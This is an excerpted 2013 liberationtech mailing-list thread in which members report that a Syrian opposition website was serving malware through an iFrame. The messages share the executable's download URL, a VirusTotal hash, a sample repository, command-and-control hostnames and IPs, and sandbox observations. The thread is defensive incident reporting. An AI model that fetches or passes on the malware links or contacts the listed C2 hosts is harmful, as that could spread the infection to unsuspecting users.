Re: [liberationtech] Syrian-martyrs.com website probably compromised by virus

2013-01-30 Thread hadi
Many thanks for posting. I'll spread this to my Syrian friends just to be aware of this. All the best, Hadi On 01/29/2013 11:05 PM, KheOps wrote: Dear Libtech, We just saw that the website : http://www.syrian-martyrs.com is probably compromised. Every page of the website contains an iFrame

Re: [liberationtech] Syrian-martyrs.com website probably compromised by virus

2013-01-30 Thread KheOps
Hello, I wrote a first summary on the case, I will try to keep it up to date with new data, https://words.ceops.eu/posts/Infected%20Syrian%20opposition%20website%20spreads%20malware%20to%20its%20visitors/ ALl the best, KheOps Le 30/01/2013 00:00, SiNA Rabbani a écrit : Hi! I sent the

Re: [liberationtech] Syrian-martyrs.com website probably compromised by virus - UPDATE

2013-01-30 Thread SiNA Rabbani
-BEGIN PGP SIGNED MESSAGE- Hash: SHA512 Dear List, Here is more details with credit to: Team Cymru: http://www.team-cymru.org/ CC nodes for this version: melaniibaby.no-ip.biz 173.0.10.52 ghostsx.8866.org 192.168.11.1 (so not likely to connect) awrasx10.no-ip.biz 95.170.198.155

[liberationtech] Syrian-martyrs.com website probably compromised by virus

2013-01-29 Thread KheOps
Dear Libtech, We just saw that the website : http://www.syrian-martyrs.com is probably compromised. Every page of the website contains an iFrame which links to a .exe file which is detected as a virus by antivirus software: http://acadcisco.unisla.pt/downloads/uploads/software/ActiveX.exe The

Re: [liberationtech] Syrian-martyrs.com website probably compromised by virus

2013-01-29 Thread KheOps
Hey, Le 29/01/2013 23:34, SiNA Rabbani a écrit : This is the malware: https://www.virustotal.com/file/cfdd3a78a895b3f49a39402eb28b0d2134cc3086849a41a6fdfe7d829a0d4dcd/analysis/ Yes, saw that too. However, I don't find any precise description of its behaviour. Like, what it does, if it opens

Re: [liberationtech] Syrian-martyrs.com website probably compromised by virus

2013-01-29 Thread Andrew Lewis
Just a heads up the sites been taken down, malware is here: https://resources.telecomix.ceops.eu/material/malwares/ Also looking at getting access to the server in question for forensics. -Andrew On Jan 30, 2013, at 11:34 AM, SiNA Rabbani s...@redteam.io wrote: -BEGIN PGP SIGNED

Re: [liberationtech] Syrian-martyrs.com website probably compromised by virus

2013-01-29 Thread SiNA Rabbani
-BEGIN PGP SIGNED MESSAGE- Hash: SHA512 Ok. I infected an old Windoes xp with this malware and it keeps sending SYN requests to this hostname: awrasx10.no-ip.biz which currently resolved to: 37.236.124.197 and is down for me. - --SiNA Internet Protocol Version 4, Src: 10.10.10.17

Re: [liberationtech] Syrian-martyrs.com website probably compromised by virus

2013-01-29 Thread KheOps
Hello, Le 30/01/2013 03:02, SiNA Rabbani a écrit : Ok. I infected an old Windoes xp with this malware and it keeps sending SYN requests to this hostname: awrasx10.no-ip.biz which currently resolved to: 37.236.124.197 and is down for me. Thank you for your work :) The hostname still resolves